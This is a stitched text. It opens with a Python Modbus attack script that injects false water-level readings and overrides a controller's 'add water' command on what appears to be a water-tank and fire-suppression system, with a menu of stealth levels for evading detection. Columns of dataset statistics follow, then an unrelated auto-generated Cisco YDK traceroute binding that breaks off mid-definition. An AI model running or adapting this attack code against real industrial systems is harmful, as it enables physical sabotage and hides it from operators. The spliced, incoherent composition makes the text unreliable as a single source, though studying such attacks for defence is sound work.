            steamStep = ne.modbusDecode(13, 2, 4, result.registers)
            outputs = []
            waterLevel = 500000 - (1500 * (random.randint(85, 115) / 100)) + addWater
            outputs = []
            levelElements = ne.modbusEncode(waterLevel, 4, 4, outputs)
            result.registers[0] = levelElements[0]
            result.registers[1] = levelElements[1]
            result.registers[2] = levelElements[2]
            result.registers[3] = levelElements[3]
            result.registers[20] = 1
            write = client.write_registers(3, result.registers, unit=1)
if response == 'c':
    # Command injection: overwrite the master's "add water" command so the
    # slave keeps filling regardless of the real control decision.
    print("Enter stealth level:")
    print("[1] - Blatantly obvious")
    print("[2] - Plausible")
    print("[3] - Harder to detect")
    print("[4] - Hard to detect")
    print("[q]uit")
    while response != '1' and response != '2' and response != '3' and response != '4' and response != 'q':
        response = input('>')
    if response == 'q':
        exit(0)
    if response == '1':
        while True:
            # 1,500L constant fill, no fire
            result = client.read_holding_registers(0, 22, unit=1)
            addWater = ne.modbusDecode(0, 2, 2, result.registers)
            addWater = 1500
            outputs = []
            # NOTE(review): modbusEncode is called twice with the same
            # `outputs` list; kept as-is because its mutation semantics
            # are defined in the project-local networkEncoder module.
            result.registers[0] = ne.modbusEncode(addWater, 2, 2, outputs)[0]
            result.registers[1] = ne.modbusEncode(addWater, 2, 2, outputs)[1]
            result.registers[2] = 1
            result.registers[21] = 1
            write = client.write_registers(0, result.registers, unit=1)
    if response == '2':
        while True:
            # 1,500L constant fill, current fire state
            result = client.read_holding_registers(0, 22, unit=1)
            addWater = ne.modbusDecode(0, 2, 2, result.registers)
            addWater = 1500
            outputs = []
            result.registers[0] = ne.modbusEncode(addWater, 2, 2, outputs)[0]
            result.registers[1] = ne.modbusEncode(addWater, 2, 2, outputs)[1]
            result.registers[21] = 1
            write = client.write_registers(0, result.registers, unit=1)
    if response == '3':
        while True:
            # 1,500L constant fill +- 10%, current fire state
            result = client.read_holding_registers(0, 22, unit=1)
            addWater = ne.modbusDecode(0, 2, 2, result.registers)
            addWater = 1500 * (random.randint(90, 110) / 100)
            outputs = []
            result.registers[0] = ne.modbusEncode(addWater, 2, 2, outputs)[0]
            result.registers[1] = ne.modbusEncode(addWater, 2, 2, outputs)[1]
            result.registers[21] = 1
            write = client.write_registers(0, result.registers, unit=1)
    if response == '4':
        while True:
            # Add water value + 0-5%, if no fire, + 5-10% if fire
            result = client.read_holding_registers(0, 22, unit=1)
            addWater = ne.modbusDecode(0, 2, 2, result.registers)
            addFire = ne.modbusDecode(2, 2, 0, result.registers)
            if addFire:
                addWater = 500 + (addWater * (random.randint(105, 110) / 100))
            else:
                addWater = 500 + (addWater * (random.randint(100, 105) / 100))
            outputs = []
            result.registers[0] = ne.modbusEncode(addWater, 2, 2, outputs)[0]
            result.registers[1] = ne.modbusEncode(addWater, 2, 2, outputs)[1]
            result.registers[21] = 1
            write = client.write_registers(0, result.registers, unit=1)
# NOTE(review): unreachable in practice -- every attack branch loops
# forever; the client is only closed if no branch was entered.
client.close()
| 39.491228
| 106
| 0.574708
| 784
| 6,753
| 4.917092
| 0.139031
| 0.202335
| 0.058106
| 0.04773
| 0.867964
| 0.832425
| 0.819455
| 0.819455
| 0.798184
| 0.75201
| 0
| 0.071338
| 0.296313
| 6,753
| 170
| 107
| 39.723529
| 0.739899
| 0.051088
| 0
| 0.79562
| 0
| 0
| 0.064063
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.014599
| null | null | 0.116788
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
82aff54a00188b96d46a87aa27129c0a52d5f3ed
| 44,283
|
py
|
Python
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_traceroute_act.py
|
Maikor/ydk-py
|
b86c4a7c570ae3b2c5557d098420446df5de4929
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_traceroute_act.py
|
Maikor/ydk-py
|
b86c4a7c570ae3b2c5557d098420446df5de4929
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_traceroute_act.py
|
Maikor/ydk-py
|
b86c4a7c570ae3b2c5557d098420446df5de4929
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
""" Cisco_IOS_XR_traceroute_act
This module contains a collection of YANG definitions
for Cisco IOS\-XR ping action package configuration.
Copyright (c) 2016 by Cisco Systems, Inc.
All rights reserved.
"""
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class Traceroute(Entity):
"""
Trace route to destination
.. attribute:: input
**type**\: :py:class:`Input <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Input>`
.. attribute:: output
**type**\: :py:class:`Output <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Output>`
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute, self).__init__()
self._top_entity = None
self.yang_name = "traceroute"
self.yang_parent_name = "Cisco-IOS-XR-traceroute-act"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict()
self.input = Traceroute.Input()
self.input.parent = self
self._children_name_map["input"] = "input"
self.output = Traceroute.Output()
self.output.parent = self
self._children_name_map["output"] = "output"
self._segment_path = lambda: "Cisco-IOS-XR-traceroute-act:traceroute"
self._is_frozen = True
class Input(Entity):
"""
.. attribute:: destination
**type**\: :py:class:`Destination <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Input.Destination>`
.. attribute:: ipv4
**type**\: :py:class:`Ipv4 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Input.Ipv4>`
.. attribute:: ipv6
**type**\: :py:class:`Ipv6 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Input.Ipv6>`
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute.Input, self).__init__()
self.yang_name = "input"
self.yang_parent_name = "traceroute"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("destination", ("destination", Traceroute.Input.Destination)), ("ipv4", ("ipv4", Traceroute.Input.Ipv4)), ("ipv6", ("ipv6", Traceroute.Input.Ipv6))])
self._leafs = OrderedDict()
self.destination = Traceroute.Input.Destination()
self.destination.parent = self
self._children_name_map["destination"] = "destination"
self.ipv4 = Traceroute.Input.Ipv4()
self.ipv4.parent = self
self._children_name_map["ipv4"] = "ipv4"
self.ipv6 = Traceroute.Input.Ipv6()
self.ipv6.parent = self
self._children_name_map["ipv6"] = "ipv6"
self._segment_path = lambda: "input"
self._absolute_path = lambda: "Cisco-IOS-XR-traceroute-act:traceroute/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Traceroute.Input, [], name, value)
class Destination(Entity):
"""
.. attribute:: destination
Destination address or hostname
**type**\: str
**mandatory**\: True
.. attribute:: source
Source address or interface
**type**\: str
.. attribute:: timeout
Timeout in seconds
**type**\: int
**range:** 0..36
**default value**\: 3
.. attribute:: probe
Probe count
**type**\: int
**range:** 1..64
**default value**\: 3
.. attribute:: numeric
Numeric display only
**type**\: bool
.. attribute:: vrf_name
VRF name
**type**\: str
.. attribute:: min_ttl
minimum time to live
**type**\: int
**range:** 0..255
**default value**\: 1
.. attribute:: max_ttl
maximum time to live
**type**\: int
**range:** 0..255
**default value**\: 30
.. attribute:: port
Port numbe
**type**\: int
**range:** 0..65535
.. attribute:: verbose
verbose output
**type**\: bool
.. attribute:: priority
Priority of hte packet
**type**\: int
**range:** 0..15
.. attribute:: outgoing_interface
Outgoing interface, needed in case of traceroute to link local address
**type**\: str
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute.Input.Destination, self).__init__()
self.yang_name = "destination"
self.yang_parent_name = "input"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('destination', (YLeaf(YType.str, 'destination'), ['str'])),
('source', (YLeaf(YType.str, 'source'), ['str'])),
('timeout', (YLeaf(YType.uint32, 'timeout'), ['int'])),
('probe', (YLeaf(YType.uint16, 'probe'), ['int'])),
('numeric', (YLeaf(YType.boolean, 'numeric'), ['bool'])),
('vrf_name', (YLeaf(YType.str, 'vrf-name'), ['str'])),
('min_ttl', (YLeaf(YType.uint16, 'min-ttl'), ['int'])),
('max_ttl', (YLeaf(YType.uint16, 'max-ttl'), ['int'])),
('port', (YLeaf(YType.uint32, 'port'), ['int'])),
('verbose', (YLeaf(YType.boolean, 'verbose'), ['bool'])),
('priority', (YLeaf(YType.uint16, 'priority'), ['int'])),
('outgoing_interface', (YLeaf(YType.str, 'outgoing-interface'), ['str'])),
])
self.destination = None
self.source = None
self.timeout = None
self.probe = None
self.numeric = None
self.vrf_name = None
self.min_ttl = None
self.max_ttl = None
self.port = None
self.verbose = None
self.priority = None
self.outgoing_interface = None
self._segment_path = lambda: "destination"
self._absolute_path = lambda: "Cisco-IOS-XR-traceroute-act:traceroute/input/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Traceroute.Input.Destination, [u'destination', u'source', u'timeout', u'probe', u'numeric', u'vrf_name', u'min_ttl', u'max_ttl', u'port', u'verbose', 'priority', 'outgoing_interface'], name, value)
class Ipv4(Entity):
"""
.. attribute:: destination
Destination address or hostname
**type**\: str
**mandatory**\: True
.. attribute:: source
Source address or interface
**type**\: str
.. attribute:: timeout
Timeout in seconds
**type**\: int
**range:** 0..36
**default value**\: 3
.. attribute:: probe
Probe count
**type**\: int
**range:** 1..64
**default value**\: 3
.. attribute:: numeric
Numeric display only
**type**\: bool
.. attribute:: vrf_name
VRF name
**type**\: str
.. attribute:: min_ttl
minimum time to live
**type**\: int
**range:** 0..255
**default value**\: 1
.. attribute:: max_ttl
maximum time to live
**type**\: int
**range:** 0..255
**default value**\: 30
.. attribute:: port
Port numbe
**type**\: int
**range:** 0..65535
.. attribute:: verbose
verbose output
**type**\: bool
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute.Input.Ipv4, self).__init__()
self.yang_name = "ipv4"
self.yang_parent_name = "input"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('destination', (YLeaf(YType.str, 'destination'), ['str'])),
('source', (YLeaf(YType.str, 'source'), ['str'])),
('timeout', (YLeaf(YType.uint32, 'timeout'), ['int'])),
('probe', (YLeaf(YType.uint16, 'probe'), ['int'])),
('numeric', (YLeaf(YType.boolean, 'numeric'), ['bool'])),
('vrf_name', (YLeaf(YType.str, 'vrf-name'), ['str'])),
('min_ttl', (YLeaf(YType.uint16, 'min-ttl'), ['int'])),
('max_ttl', (YLeaf(YType.uint16, 'max-ttl'), ['int'])),
('port', (YLeaf(YType.uint32, 'port'), ['int'])),
('verbose', (YLeaf(YType.boolean, 'verbose'), ['bool'])),
])
self.destination = None
self.source = None
self.timeout = None
self.probe = None
self.numeric = None
self.vrf_name = None
self.min_ttl = None
self.max_ttl = None
self.port = None
self.verbose = None
self._segment_path = lambda: "ipv4"
self._absolute_path = lambda: "Cisco-IOS-XR-traceroute-act:traceroute/input/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Traceroute.Input.Ipv4, [u'destination', u'source', u'timeout', u'probe', u'numeric', u'vrf_name', u'min_ttl', u'max_ttl', u'port', u'verbose'], name, value)
class Ipv6(Entity):
"""
.. attribute:: destination
Destination address or hostname
**type**\: str
**mandatory**\: True
.. attribute:: source
Source address or interface
**type**\: str
.. attribute:: timeout
Timeout in seconds
**type**\: int
**range:** 0..36
**default value**\: 3
.. attribute:: probe
Probe count
**type**\: int
**range:** 1..64
**default value**\: 3
.. attribute:: numeric
Numeric display only
**type**\: bool
.. attribute:: vrf_name
VRF name
**type**\: str
.. attribute:: min_ttl
minimum time to live
**type**\: int
**range:** 0..255
**default value**\: 1
.. attribute:: max_ttl
maximum time to live
**type**\: int
**range:** 0..255
**default value**\: 30
.. attribute:: port
Port numbe
**type**\: int
**range:** 0..65535
.. attribute:: verbose
verbose output
**type**\: bool
.. attribute:: priority
Priority of hte packet
**type**\: int
**range:** 0..15
.. attribute:: outgoing_interface
Outgoing interface, needed in case of traceroute to link local address
**type**\: str
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute.Input.Ipv6, self).__init__()
self.yang_name = "ipv6"
self.yang_parent_name = "input"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('destination', (YLeaf(YType.str, 'destination'), ['str'])),
('source', (YLeaf(YType.str, 'source'), ['str'])),
('timeout', (YLeaf(YType.uint32, 'timeout'), ['int'])),
('probe', (YLeaf(YType.uint16, 'probe'), ['int'])),
('numeric', (YLeaf(YType.boolean, 'numeric'), ['bool'])),
('vrf_name', (YLeaf(YType.str, 'vrf-name'), ['str'])),
('min_ttl', (YLeaf(YType.uint16, 'min-ttl'), ['int'])),
('max_ttl', (YLeaf(YType.uint16, 'max-ttl'), ['int'])),
('port', (YLeaf(YType.uint32, 'port'), ['int'])),
('verbose', (YLeaf(YType.boolean, 'verbose'), ['bool'])),
('priority', (YLeaf(YType.uint16, 'priority'), ['int'])),
('outgoing_interface', (YLeaf(YType.str, 'outgoing-interface'), ['str'])),
])
self.destination = None
self.source = None
self.timeout = None
self.probe = None
self.numeric = None
self.vrf_name = None
self.min_ttl = None
self.max_ttl = None
self.port = None
self.verbose = None
self.priority = None
self.outgoing_interface = None
self._segment_path = lambda: "ipv6"
self._absolute_path = lambda: "Cisco-IOS-XR-traceroute-act:traceroute/input/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Traceroute.Input.Ipv6, [u'destination', u'source', u'timeout', u'probe', u'numeric', u'vrf_name', u'min_ttl', u'max_ttl', u'port', u'verbose', 'priority', 'outgoing_interface'], name, value)
class Output(Entity):
"""
.. attribute:: traceroute_response
**type**\: :py:class:`TracerouteResponse <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Output.TracerouteResponse>`
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute.Output, self).__init__()
self.yang_name = "output"
self.yang_parent_name = "traceroute"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("traceroute-response", ("traceroute_response", Traceroute.Output.TracerouteResponse))])
self._leafs = OrderedDict()
self.traceroute_response = Traceroute.Output.TracerouteResponse()
self.traceroute_response.parent = self
self._children_name_map["traceroute_response"] = "traceroute-response"
self._segment_path = lambda: "output"
self._absolute_path = lambda: "Cisco-IOS-XR-traceroute-act:traceroute/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Traceroute.Output, [], name, value)
class TracerouteResponse(Entity):
"""
.. attribute:: ipv4
**type**\: :py:class:`Ipv4 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Output.TracerouteResponse.Ipv4>`
.. attribute:: ipv6
**type**\: :py:class:`Ipv6 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Output.TracerouteResponse.Ipv6>`
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute.Output.TracerouteResponse, self).__init__()
self.yang_name = "traceroute-response"
self.yang_parent_name = "output"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("ipv4", ("ipv4", Traceroute.Output.TracerouteResponse.Ipv4)), ("ipv6", ("ipv6", Traceroute.Output.TracerouteResponse.Ipv6))])
self._leafs = OrderedDict()
self.ipv4 = Traceroute.Output.TracerouteResponse.Ipv4()
self.ipv4.parent = self
self._children_name_map["ipv4"] = "ipv4"
self.ipv6 = Traceroute.Output.TracerouteResponse.Ipv6()
self.ipv6.parent = self
self._children_name_map["ipv6"] = "ipv6"
self._segment_path = lambda: "traceroute-response"
self._absolute_path = lambda: "Cisco-IOS-XR-traceroute-act:traceroute/output/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Traceroute.Output.TracerouteResponse, [], name, value)
class Ipv4(Entity):
"""
.. attribute:: destination
Destination address or hostname
**type**\: str
.. attribute:: hops
**type**\: :py:class:`Hops <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Output.TracerouteResponse.Ipv4.Hops>`
.. attribute:: verbose_output
Verbose output
**type**\: str
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute.Output.TracerouteResponse.Ipv4, self).__init__()
self.yang_name = "ipv4"
self.yang_parent_name = "traceroute-response"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("hops", ("hops", Traceroute.Output.TracerouteResponse.Ipv4.Hops))])
self._leafs = OrderedDict([
('destination', (YLeaf(YType.str, 'destination'), ['str'])),
('verbose_output', (YLeaf(YType.str, 'verbose-output'), ['str'])),
])
self.destination = None
self.verbose_output = None
self.hops = Traceroute.Output.TracerouteResponse.Ipv4.Hops()
self.hops.parent = self
self._children_name_map["hops"] = "hops"
self._segment_path = lambda: "ipv4"
self._absolute_path = lambda: "Cisco-IOS-XR-traceroute-act:traceroute/output/traceroute-response/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Traceroute.Output.TracerouteResponse.Ipv4, [u'destination', u'verbose_output'], name, value)
class Hops(Entity):
"""
.. attribute:: hop
**type**\: list of :py:class:`Hop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Output.TracerouteResponse.Ipv4.Hops.Hop>`
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute.Output.TracerouteResponse.Ipv4.Hops, self).__init__()
self.yang_name = "hops"
self.yang_parent_name = "ipv4"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("hop", ("hop", Traceroute.Output.TracerouteResponse.Ipv4.Hops.Hop))])
self._leafs = OrderedDict()
self.hop = YList(self)
self._segment_path = lambda: "hops"
self._absolute_path = lambda: "Cisco-IOS-XR-traceroute-act:traceroute/output/traceroute-response/ipv4/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Traceroute.Output.TracerouteResponse.Ipv4.Hops, [], name, value)
class Hop(Entity):
"""
.. attribute:: hop_index (key)
Index of the hop
**type**\: int
**range:** 0..4294967295
.. attribute:: hop_address
Address of the hop
**type**\: str
.. attribute:: hop_hostname
Hostname of the hop
**type**\: str
.. attribute:: probes
**type**\: :py:class:`Probes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Output.TracerouteResponse.Ipv4.Hops.Hop.Probes>`
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute.Output.TracerouteResponse.Ipv4.Hops.Hop, self).__init__()
self.yang_name = "hop"
self.yang_parent_name = "hops"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['hop_index']
self._child_classes = OrderedDict([("probes", ("probes", Traceroute.Output.TracerouteResponse.Ipv4.Hops.Hop.Probes))])
self._leafs = OrderedDict([
('hop_index', (YLeaf(YType.uint32, 'hop-index'), ['int'])),
('hop_address', (YLeaf(YType.str, 'hop-address'), ['str'])),
('hop_hostname', (YLeaf(YType.str, 'hop-hostname'), ['str'])),
])
self.hop_index = None
self.hop_address = None
self.hop_hostname = None
self.probes = Traceroute.Output.TracerouteResponse.Ipv4.Hops.Hop.Probes()
self.probes.parent = self
self._children_name_map["probes"] = "probes"
self._segment_path = lambda: "hop" + "[hop-index='" + str(self.hop_index) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-traceroute-act:traceroute/output/traceroute-response/ipv4/hops/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Traceroute.Output.TracerouteResponse.Ipv4.Hops.Hop, [u'hop_index', u'hop_address', u'hop_hostname'], name, value)
class Probes(Entity):
"""
.. attribute:: probe
**type**\: list of :py:class:`Probe <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Output.TracerouteResponse.Ipv4.Hops.Hop.Probes.Probe>`
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute.Output.TracerouteResponse.Ipv4.Hops.Hop.Probes, self).__init__()
self.yang_name = "probes"
self.yang_parent_name = "hop"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("probe", ("probe", Traceroute.Output.TracerouteResponse.Ipv4.Hops.Hop.Probes.Probe))])
self._leafs = OrderedDict()
self.probe = YList(self)
self._segment_path = lambda: "probes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Traceroute.Output.TracerouteResponse.Ipv4.Hops.Hop.Probes, [], name, value)
class Probe(Entity):
"""
.. attribute:: probe_index (key)
Index of the probe
**type**\: int
**range:** 0..4294967295
.. attribute:: result
Response for each probe
**type**\: str
.. attribute:: delta_time
Delta time in seconds
**type**\: int
**range:** 0..4294967295
.. attribute:: hop_address
Address of the hop
**type**\: str
.. attribute:: hop_hostname
Hostname of the hop
**type**\: str
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute.Output.TracerouteResponse.Ipv4.Hops.Hop.Probes.Probe, self).__init__()
self.yang_name = "probe"
self.yang_parent_name = "probes"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['probe_index']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('probe_index', (YLeaf(YType.uint32, 'probe-index'), ['int'])),
('result', (YLeaf(YType.str, 'result'), ['str'])),
('delta_time', (YLeaf(YType.uint32, 'delta-time'), ['int'])),
('hop_address', (YLeaf(YType.str, 'hop-address'), ['str'])),
('hop_hostname', (YLeaf(YType.str, 'hop-hostname'), ['str'])),
])
self.probe_index = None
self.result = None
self.delta_time = None
self.hop_address = None
self.hop_hostname = None
self._segment_path = lambda: "probe" + "[probe-index='" + str(self.probe_index) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Traceroute.Output.TracerouteResponse.Ipv4.Hops.Hop.Probes.Probe, [u'probe_index', u'result', u'delta_time', u'hop_address', u'hop_hostname'], name, value)
class Ipv6(Entity):
"""
.. attribute:: destination
Destination address or hostname
**type**\: str
.. attribute:: hops
**type**\: :py:class:`Hops <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Output.TracerouteResponse.Ipv6.Hops>`
.. attribute:: verbose_output
Verbose output
**type**\: str
"""
# YANG module metadata for this auto-generated binding.
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
# NOTE(review): generated YDK entity __init__; _is_frozen must stay the
# last assignment so earlier writes bypass _perform_setattr validation.
super(Traceroute.Output.TracerouteResponse.Ipv6, self).__init__()
self.yang_name = "ipv6"
self.yang_parent_name = "traceroute-response"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
# Child container: YANG name "hops" -> nested Hops entity class.
self._child_classes = OrderedDict([("hops", ("hops", Traceroute.Output.TracerouteResponse.Ipv6.Hops))])
# Leaf metadata: python attribute -> (YLeaf descriptor, accepted python types).
self._leafs = OrderedDict([
('destination', (YLeaf(YType.str, 'destination'), ['str'])),
('verbose_output', (YLeaf(YType.str, 'verbose-output'), ['str'])),
])
self.destination = None
self.verbose_output = None
# Eagerly instantiate the child container and wire up the parent link.
self.hops = Traceroute.Output.TracerouteResponse.Ipv6.Hops()
self.hops.parent = self
self._children_name_map["hops"] = "hops"
self._segment_path = lambda: "ipv6"
self._absolute_path = lambda: "Cisco-IOS-XR-traceroute-act:traceroute/output/traceroute-response/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
# Route attribute writes through YDK validation for the declared leafs.
self._perform_setattr(Traceroute.Output.TracerouteResponse.Ipv6, [u'destination', u'verbose_output'], name, value)
class Hops(Entity):
"""
.. attribute:: hop
**type**\: list of :py:class:`Hop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Output.TracerouteResponse.Ipv6.Hops.Hop>`
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute.Output.TracerouteResponse.Ipv6.Hops, self).__init__()
self.yang_name = "hops"
self.yang_parent_name = "ipv6"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("hop", ("hop", Traceroute.Output.TracerouteResponse.Ipv6.Hops.Hop))])
self._leafs = OrderedDict()
# YANG list "hop": entries are Hop instances keyed by hop-index.
self.hop = YList(self)
self._segment_path = lambda: "hops"
self._absolute_path = lambda: "Cisco-IOS-XR-traceroute-act:traceroute/output/traceroute-response/ipv6/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
# No leafs on this container, hence the empty leaf-name list.
self._perform_setattr(Traceroute.Output.TracerouteResponse.Ipv6.Hops, [], name, value)
class Hop(Entity):
"""
.. attribute:: hop_index (key)
Index of the hop
**type**\: int
**range:** 0..4294967295
.. attribute:: hop_address
Address of the hop
**type**\: str
.. attribute:: hop_hostname
Hostname of the hop
**type**\: str
.. attribute:: probes
**type**\: :py:class:`Probes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Output.TracerouteResponse.Ipv6.Hops.Hop.Probes>`
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute.Output.TracerouteResponse.Ipv6.Hops.Hop, self).__init__()
self.yang_name = "hop"
self.yang_parent_name = "hops"
self.is_top_level_class = False
self.has_list_ancestor = False
# 'hop_index' is the YANG list key for this list entry.
self.ylist_key_names = ['hop_index']
self._child_classes = OrderedDict([("probes", ("probes", Traceroute.Output.TracerouteResponse.Ipv6.Hops.Hop.Probes))])
self._leafs = OrderedDict([
('hop_index', (YLeaf(YType.uint32, 'hop-index'), ['int'])),
('hop_address', (YLeaf(YType.str, 'hop-address'), ['str'])),
('hop_hostname', (YLeaf(YType.str, 'hop-hostname'), ['str'])),
])
self.hop_index = None
self.hop_address = None
self.hop_hostname = None
# Eagerly instantiate the child container and wire up the parent link.
self.probes = Traceroute.Output.TracerouteResponse.Ipv6.Hops.Hop.Probes()
self.probes.parent = self
self._children_name_map["probes"] = "probes"
# XPath segment embeds the list-key predicate, e.g. hop[hop-index='1'].
self._segment_path = lambda: "hop" + "[hop-index='" + str(self.hop_index) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-traceroute-act:traceroute/output/traceroute-response/ipv6/hops/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Traceroute.Output.TracerouteResponse.Ipv6.Hops.Hop, [u'hop_index', u'hop_address', u'hop_hostname'], name, value)
class Probes(Entity):
"""
.. attribute:: probe
**type**\: list of :py:class:`Probe <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Output.TracerouteResponse.Ipv6.Hops.Hop.Probes.Probe>`
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute.Output.TracerouteResponse.Ipv6.Hops.Hop.Probes, self).__init__()
self.yang_name = "probes"
self.yang_parent_name = "hop"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("probe", ("probe", Traceroute.Output.TracerouteResponse.Ipv6.Hops.Hop.Probes.Probe))])
self._leafs = OrderedDict()
# YANG list "probe": entries are Probe instances keyed by probe-index.
self.probe = YList(self)
self._segment_path = lambda: "probes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Traceroute.Output.TracerouteResponse.Ipv6.Hops.Hop.Probes, [], name, value)
class Probe(Entity):
"""
.. attribute:: probe_index (key)
Index of the probe
**type**\: int
**range:** 0..4294967295
.. attribute:: result
Response for each probe
**type**\: str
.. attribute:: delta_time
Delta time in seconds
**type**\: int
**range:** 0..4294967295
.. attribute:: hop_address
Address of the hop
**type**\: str
.. attribute:: hop_hostname
Hostname of the hop
**type**\: str
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute.Output.TracerouteResponse.Ipv6.Hops.Hop.Probes.Probe, self).__init__()
self.yang_name = "probe"
self.yang_parent_name = "probes"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['probe_index']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('probe_index', (YLeaf(YType.uint32, 'probe-index'), ['int'])),
('result', (YLeaf(YType.str, 'result'), ['str'])),
('delta_time', (YLeaf(YType.uint32, 'delta-time'), ['int'])),
